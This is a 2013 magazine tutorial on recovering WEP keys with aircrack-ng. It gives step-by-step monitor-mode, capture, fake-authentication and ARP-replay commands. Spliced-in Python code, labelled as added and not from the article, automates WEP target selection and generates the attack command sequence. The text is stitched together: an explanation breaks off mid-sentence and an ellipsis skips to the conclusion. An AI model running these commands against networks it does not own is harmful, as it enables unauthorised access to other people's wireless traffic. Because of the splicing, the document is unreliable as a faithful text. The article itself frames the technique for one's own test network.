8/10/2019 Hacking teaser 2013
1/13
March, 26th 2013
01/2013
Why BackTrack?
BackTrack is a specialized Linux distribution (distro) based on Debian GNU/Linux that bundles a large collection of tools for penetration testing and digital forensics. The current release is BackTrack 5 Release 3 (BT5 R3), which we will use in all of the examples and demos that follow. BackTrack has become the de facto standard for IT security professionals working in the penetration testing field, with plenty of documentation and training material available. (BackTrack has since been succeeded by Kali Linux; the aircrack-ng workflow below is the same there, except that newer airmon-ng versions name the monitor interface wlan0mon instead of mon0.) Further information about BackTrack and download links are on the official BackTrack site: http://www.backtrack-linux.org/
What is the Aircrack-ng Suite?
Aircrack-ng (Next Generation) is a suite of tools that includes a packet detector, a sniffer, a packet injector and WEP, WPA and WPA2 cracking tools. It runs on both Linux and Windows, but Linux is strongly recommended: the problem is not Aircrack-ng itself on Windows but the Windows platform, where the closed drivers for most wireless cards do not expose monitor mode or packet injection. For more information on the tools, tutorials, downloads and supported configurations, see the official site: http://www.aircrack-ng.org/
WEP threats
WEP (Wired Equivalent Privacy) is one of the first encryption schemes used in wireless LANs to protect data travelling over the air; it is also used in the Shared Key authentication mechanism to verify the wireless client device. WEP uses RC4, a stream cipher designed at RSA Security, as its pseudo-random number generator (PRNG). The main problems with WEP are:
1. The RC4 algorithm was posted anonymously on the Internet in the mid 90s, so anyone can study it. (A public cipher is not a weakness in itself; the real damage comes from how WEP uses RC4, in particular the short 24-bit IV described below.)
2. Many software packages, most of them free, are available to crack WEP, so no special skill is required to break it.
RC4
RC4 is a very popular cipher adopted by many applications. One well-known user was SSL (the Secure Sockets Layer protocol, now TLS), which most web sites use to protect their traffic, although RC4 has since been deprecated there. In WEP the RC4 key consists of two parts, a static part and a dynamic part.
The static part is the shared secret key that the user enters in the wireless device in order to connect to the network; it is sometimes called the pre-shared key or password. This key is either 40 or 104 bits long and can be entered either as hexadecimal digits or as ASCII text: in hexadecimal you enter 10 characters for a 40-bit key and 26 characters for a 104-bit key; in ASCII you enter 5 characters for a 40-bit key and 13 characters for a 104-bit key.
The dynamic part is the IV (Initialization Vector). It is 24 bits long and changes from frame to frame, which is why it is called dynamic. The IV is prepended to the shared secret key (it forms the first three bytes of the RC4 key) and is transmitted in the clear in every frame, which is exactly what the attack below collects. Together they give what vendors market as 64-bit (40 + 24) or 128-bit (104 + 24) WEP, although only the 40 or 104 bits of the static key are actually secret.
How WEP Works:
RC4 produces a keystream that is combined with the data using XOR (a binary operation that outputs 0 where the two input bits are identical and 1 where they differ) to encrypt; XOR with the same keystream decrypts.
WEP Encryption Process:
1. The actual data (unencrypted plain text) sent from the sender station first passes through an integrity check algorithm, which creates an
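The RC4 key layout and the XOR-with-keystream process described in the two sections above, as an added, constructed example (this is not code from the article): a from-scratch RC4, the 40/104-bit key forms the user types, the WEP framing (24-bit IV prepended to the static key, CRC-32 ICV appended to the data) and a demonstration of why a repeated IV leaks plaintext without the key. The key, IV and messages are made up for the example.

```python
# Added example: RC4 and WEP framing as described in the article.
# Not code from the article; key, IV and messages below are constructed.
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Return `length` bytes of RC4 keystream for `key` (KSA, then PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                   # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_secret(key_text: str) -> bytes:
    """Static key as the user types it: 10/26 hex digits or 5/13 ASCII characters."""
    if len(key_text) in (10, 26):             # hexadecimal form
        key = bytes.fromhex(key_text)
    else:                                     # ASCII form
        key = key_text.encode("ascii")
    if len(key) not in (5, 13):
        raise ValueError("WEP static key must be 40 or 104 bits")
    return key


def wep_encrypt(secret: bytes, iv: bytes, data: bytes) -> bytes:
    """Return IV || RC4_{IV||secret}(data || ICV). The IV travels in the clear."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    icv = struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)   # integrity check value (CRC-32)
    keystream = rc4_keystream(iv + secret, len(data) + 4)    # IV is the first 3 key bytes
    body = bytes(p ^ k for p, k in zip(data + icv, keystream))
    return iv + body


def wep_decrypt(secret: bytes, frame: bytes):
    """Return (data, icv_ok). A wrong key yields garbage and a failed ICV check."""
    iv, body = frame[:3], frame[3:]
    keystream = rc4_keystream(iv + secret, len(body))
    plain = bytes(c ^ k for c, k in zip(body, keystream))
    data, icv = plain[:-4], plain[-4:]
    return data, struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF) == icv


def keystream_reuse_leak(frame_a: bytes, frame_b: bytes):
    """Two frames with the same IV share a keystream, so C_a XOR C_b == P_a XOR P_b:
    an eavesdropper learns the XOR of the plaintexts with no key at all.
    Returns None when the IVs differ."""
    if frame_a[:3] != frame_b[:3]:
        return None
    n = min(len(frame_a), len(frame_b)) - 3
    return bytes(a ^ b for a, b in zip(frame_a[3:3 + n], frame_b[3:3 + n]))


IV_SPACE = 2 ** 24   # every value a 24-bit IV can take; a busy AP cycles through it in hours

if __name__ == "__main__":
    key = wep_secret("abcde")                          # 40-bit key, ASCII form (constructed)
    iv = b"\x01\x02\x03"
    f1 = wep_encrypt(key, iv, b"GET / HTTP/1.0")
    f2 = wep_encrypt(key, iv, b"POST /login HT")       # same IV reused: the flaw
    print(wep_decrypt(key, f1))
    print(keystream_reuse_leak(f1, f2).hex())
```

The leak function is the reason the attack in the rest of the article collects IVs: every frame carries its IV in the clear, and the 24-bit field is so small that repeats are guaranteed on a busy network.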
Tools and Devices Needed during the Attack
1. A laptop or computer with BackTrack 5 R3 loaded on it. It can be a virtual machine or a physical computer with reasonable RAM and processing power; my test laptop had a dual-core processor and 8 GB of RAM.
2. A wireless card able to inject traffic and packets. I will be using the most popular and widely available card, the Alfa Networks AWUS036H, which uses the Realtek RTL8187 driver supported by the Aircrack suite; other cards work too, another good one being the Netgear WN111. For the complete list of supported cards and drivers under either Windows or Linux, see http://www.aircrack-ng.org/doku.php?id=compatible_cards
3. An access point supporting WEP encryption (most access points and routers will satisfy this need). Use your own AP on your own network for this exercise.
BackTrack Basics
Turn on monitor mode: the first step in capturing and cracking the WEP key is to put the wireless card into monitor mode (similar to promiscuous mode on Ethernet, except that it also captures raw 802.11 management and control frames). The easiest way is the airmon-ng command. Running airmon-ng without any parameters lists the wireless interfaces on your computer so you can see which one to use for sniffing and injection if you have several cards. In my case I had two interfaces (the first being the wireless card built into the laptop), and I enabled monitor mode on wlan0 (the Realtek RTL8187 card) with the command shown in the attached screenshot:
airmon-ng start wlan0
On BackTrack 5 this creates a separate monitor interface named mon0, which is the interface all of the following commands use.
To check whether any process is using the wireless card and could interfere later, run airmon-ng check; if any processes are listed you can kill them with airmon-ng check kill. The next step is to identify the nearby networks. You may see many wireless networks in your coverage area, and it is certainly better to start monitor mode on the exact channel of the access point you are targeting, so that the capture is not hopping between channels and missing frames. To list the nearby access points you can either use the BackTrack graphical interface (Applications > Internet > WICD Network Manager), or use iw dev together with egrep as shown below (the command is case sensitive and the escaped spaces must be preserved; run it with the card in normal managed mode, before switching it to monitor mode):
iw dev wlan0 scan | egrep "DS\ Parameter\ set|SSID"
This prints each network's SSID line and its "DS Parameter set: channel N" line, which gives you the channel.
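The scan-and-pick-a-channel step above, as an added example that is not part of the article: instead of eyeballing the egrep output, parse the raw `iw dev wlan0 scan` text into SSID, channel and encryption type, then build the airmon-ng command for the target's channel. The scan text is constructed in the layout iw prints; the "RSN:" and "WPA:" blocks mark WPA2 and WPA, and a Privacy capability bit with neither block is WEP. The network names and BSSIDs are made up.

```python
# Added example: turn `iw dev wlan0 scan` output into a channel for airmon-ng.
# Not code from the article; SAMPLE_SCAN is constructed, not a real capture.
import re

SAMPLE_SCAN = """\
BSS 00:11:22:33:44:87(on wlan0)
    freq: 2462
    capability: ESS Privacy ShortSlotTime (0x0411)
    signal: -40.00 dBm
    SSID: TestWEP
    DS Parameter set: channel 11
BSS 00:11:22:33:44:99(on wlan0)
    freq: 2437
    capability: ESS Privacy ShortSlotTime (0x0411)
    signal: -55.00 dBm
    SSID: HomeWPA2
    DS Parameter set: channel 6
    RSN:     * Version: 1
         * Group cipher: CCMP
         * Pairwise ciphers: CCMP
         * Authentication suites: PSK
BSS 00:11:22:33:44:aa(on wlan0)
    freq: 2412
    capability: ESS ShortSlotTime (0x0401)
    signal: -70.00 dBm
    SSID: CoffeeOpen
    DS Parameter set: channel 1
"""


def parse_iw_scan(text: str) -> list:
    """One dict per BSS: bssid, ssid, channel and security (OPEN / WEP / WPA / WPA2)."""
    nets, cur = [], None
    for line in text.splitlines():
        m = re.match(r"BSS ([0-9a-fA-F:]{17})", line)    # each BSS block starts unindented
        if m:
            cur = {"bssid": m.group(1).lower(), "ssid": "", "channel": None,
                   "privacy": False, "wpa": False, "rsn": False}
            nets.append(cur)
            continue
        if cur is None:
            continue
        s = line.strip()
        if s.startswith("SSID: "):
            cur["ssid"] = s[len("SSID: "):]
        elif s.startswith("DS Parameter set: channel "):
            cur["channel"] = int(s.rsplit(" ", 1)[1])
        elif s.startswith("capability:"):
            cur["privacy"] = "Privacy" in s.split()       # encryption of some kind is on
        elif s.startswith("RSN:"):
            cur["rsn"] = True                             # WPA2 information element
        elif s.startswith("WPA:"):
            cur["wpa"] = True                             # WPA information element
    for n in nets:
        n["security"] = ("WPA2" if n["rsn"] else "WPA" if n["wpa"]
                         else "WEP" if n["privacy"] else "OPEN")
    return nets


def wep_channel(nets: list, ssid: str):
    """Channel of the WEP network named `ssid`, or None if it is absent or not WEP."""
    for n in nets:
        if n["ssid"] == ssid and n["security"] == "WEP":
            return n["channel"]
    return None


def airmon_command(channel: int, iface: str = "wlan0") -> str:
    """The article's command for locking monitor mode to one channel."""
    return f"airmon-ng start {iface} {channel}"


if __name__ == "__main__":
    nets = parse_iw_scan(SAMPLE_SCAN)
    for n in nets:
        print(n["ssid"], n["bssid"], n["channel"], n["security"])
    print(airmon_command(wep_channel(nets, "TestWEP")))
```

Classifying the networks up front also stops you from wasting time on a target the WEP attack cannot touch: the fake-authentication and ARP-replay steps later in the article apply only to networks this parser reports as WEP.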
WEP Key Recovery Step by Step Attack:
1. In my test scenario the target WEP network was on channel 11, so I started monitor mode locked to channel 11 to filter out the surrounding access points, using the command airmon-ng start wlan0 11 as shown in the picture above.
2. Start an airodump-ng capture on the target's channel and BSSID. The output is saved to a capture file on disk, to be passed later to aircrack-ng to recover the key. Airodump-ng captures 802.11 frames, and in our case what we want from them is the WEP IVs. The command used is:
airodump-ng -c 11 --bssid xx:xx:xx:xx:xx:xx -w testdemo mon0
where -c is the channel, --bssid is the MAC address of the target access point and -w is followed by the name (prefix) of the output capture file; airodump-ng appends a sequence number, so the first file is testdemo-01.cap.
As you can see in the image above, by targeting channel 11 I was able to filter the list of access points down to my target AP (ending in 87), with one station currently connected (ending in A8:42). Keep the airodump-ng window running until you finish steps 3, 4 and 5 and have gathered the needed IVs; the #Data column is the count of data frames (IVs) captured so far.
3. Run the first attack with aireplay-ng: fake authentication. The fake authentication attack is used mainly when you need to attack a WEP-enabled access point that currently has no clients associated, so you need a station of your own associated with the AP before you can inject. It works with both WEP authentication modes (Open System and Shared Key; Shared Key needs additional steps not covered here), and it should be noted that it only applies to WEP networks, not WPA or WPA2. It is good practice to always start with the fake authentication attack, because the AP will drop injected frames from a station it does not know. The command used is:
aireplay-ng -1 0 -e AP-SSID -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy mon0
where -1 selects the fake authentication attack (attack number 1), 0 is the re-association timing in seconds (0 means authenticate once), -e is the wireless network name (ESSID) that users connect to with their network cards, -a is the target access point's MAC address and -h is the MAC address of my own Realtek wireless card.
To confirm that the fake authentication was successful, look at the airodump-ng window started in step 2: the new station (our Realtek card, ending in 07:b0) appears in the list of connected stations.
4. Run an ARP request replay attack (ARP, the Address Resolution Protocol, is the TCP/IP protocol used to map an IP address to a physical address such as an Ethernet MAC address). This is one of the most effective ways to generate new IVs: aireplay-ng listens for an ARP packet and retransmits it to the access point, which makes the AP repeat the ARP packet encrypted with a new IV. This is done over and over until enough initialization vectors have been collected. The command is:
aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy mon0
where -3 selects the ARP request replay attack (attack number 3 in the suite), -b is the target AP's MAC address and -h is your own MAC address after a successful fake authentication and association to the target access point, or the MAC address of any already-associated client.
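Steps 1 to 4 above, tied together as an added example that is not part of the article: airodump-ng with -w writes a CSV summary (testdemo-01.csv) next to the .cap file, so a script can read the WEP targets, their channel, the IV count and the stations seen, and emit the exact command sequence with the placeholders filled in. The CSV text is constructed in airodump-ng's column layout; the BSSIDs, station MACs and ESSIDs are made up. The closing aircrack-ng invocation is the standard one and is assumed here, since the page does not show step 5; the IV thresholds in enough_ivs are likewise an assumption, not a figure from the article.

```python
# Added example: pick the WEP target from airodump-ng's CSV and build the
# command sequence of steps 1-4. Not code from the article; SAMPLE_CSV is
# constructed, and the final aircrack-ng line is an assumed standard invocation.
import csv
import io
import re
import shlex

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:87, 2013-03-26 10:00:01, 2013-03-26 10:12:40,  11,  54, WEP , WEP, OPN, -40,      812,    25344,   0.  0.  0.  0,   7, TestWEP,
00:11:22:33:44:99, 2013-03-26 10:00:03, 2013-03-26 10:12:40,   6,  54, WPA2, CCMP, PSK, -55,      790,        0,   0.  0.  0.  0,   8, HomeWPA2,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:A8:42, 2013-03-26 10:00:05, 2013-03-26 10:12:39, -50,     3102, 00:11:22:33:44:87,
00:C0:CA:11:07:B0, 2013-03-26 10:03:10, 2013-03-26 10:12:39,   0,      220, 00:11:22:33:44:87, TestWEP
"""


def parse_airodump_csv(text: str):
    """Return (access_points, stations): dicts keyed by the CSV header names.
    The file has two blank-line-separated sections, APs first, then stations."""
    aps, stations = [], []
    for block in re.split(r"\n\s*\n", text.strip()):
        rows = list(csv.reader(io.StringIO(block), skipinitialspace=True))
        header = [h.strip() for h in rows[0]]
        for row in rows[1:]:
            if not row or not row[0].strip():
                continue
            rec = {h: v.strip() for h, v in zip(header, row)}
            (aps if header[0] == "BSSID" else stations).append(rec)
    return aps, stations


def wep_targets(aps, stations):
    """WEP networks with channel, IV count so far and the client MACs seen on them."""
    out = []
    for ap in aps:
        if ap["Privacy"] != "WEP":
            continue
        clients = [s["Station MAC"] for s in stations if s["BSSID"] == ap["BSSID"]]
        out.append({"bssid": ap["BSSID"], "essid": ap["ESSID"], "channel": int(ap["channel"]),
                    "ivs": int(ap["# IV"]), "clients": clients})
    return out


def attack_plan(target, own_mac, capture="testdemo", iface="mon0"):
    """The article's commands for steps 1-4 with the target's values filled in,
    followed by the aircrack-ng run (assumed standard invocation, not on the page).
    For -h in the ARP replay you may also substitute one of target['clients']."""
    ch, bssid = target["channel"], target["bssid"]
    return [
        f"airmon-ng start wlan0 {ch}",
        f"airodump-ng -c {ch} --bssid {bssid} -w {capture} {iface}",
        f"aireplay-ng -1 0 -e {shlex.quote(target['essid'])} -a {bssid} -h {own_mac} {iface}",
        f"aireplay-ng -3 -b {bssid} -h {own_mac} {iface}",
        f"aircrack-ng -b {bssid} {capture}-01.cap",
    ]


def enough_ivs(target, key_bits=104, min_ivs=None) -> bool:
    """Rough readiness check before trying aircrack-ng. The defaults are an
    assumption (about 20k IVs for a 40-bit key, 40k for 104-bit), not article figures."""
    threshold = min_ivs if min_ivs is not None else (20000 if key_bits == 40 else 40000)
    return target["ivs"] >= threshold


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    target = wep_targets(aps, stations)[0]
    print(target)
    for cmd in attack_plan(target, "00:C0:CA:11:07:B0"):
        print(cmd)
    print("enough IVs for 104-bit:", enough_ivs(target))
```

The ESSID is passed through shlex.quote because network names with spaces or shell metacharacters would otherwise break the -e argument; the station list is worth printing because an already-associated client MAC is the better -h value for the ARP replay when fake authentication is being rejected by the AP.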
... only available security compared to nothing; however, you need to take some extra precautions: check for the latest firmware and drivers from your access point manufacturer, use a 128-bit key, change the key frequently, and install a free IDS to monitor connections and alert you if an attack is launched against your network. Bear in mind that these only slow an attacker down; a 104-bit key falls to exactly the same method once enough IVs are collected, so WEP should be replaced with WPA2 wherever the hardware allows.
I will try to explore more advanced WEP cracking techniques, including data / packet injection, in future articles, and then move on to the world of the famous secure WPA and WPA2 and their weaknesses (remember, there is no completely secure system).
About the author
Ahmed Nabil is an IT professional with more than 13 years of experience, specialized in IT infrastructure, security, system administration and IT management. My real passion is networking and security. I hold a BS, MS, MCITP, MCSE, CCNP, CWSP, CEH, CHFI, ITIL and PMP. You can follow me on my blog (http://itcalls.blogspot.com).
Thank you for reading our magazine from cover to cover. Please share your comments about this issue on Twitter or Facebook: @Hackinsight, http://www.facebook.com/hackinsight
The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.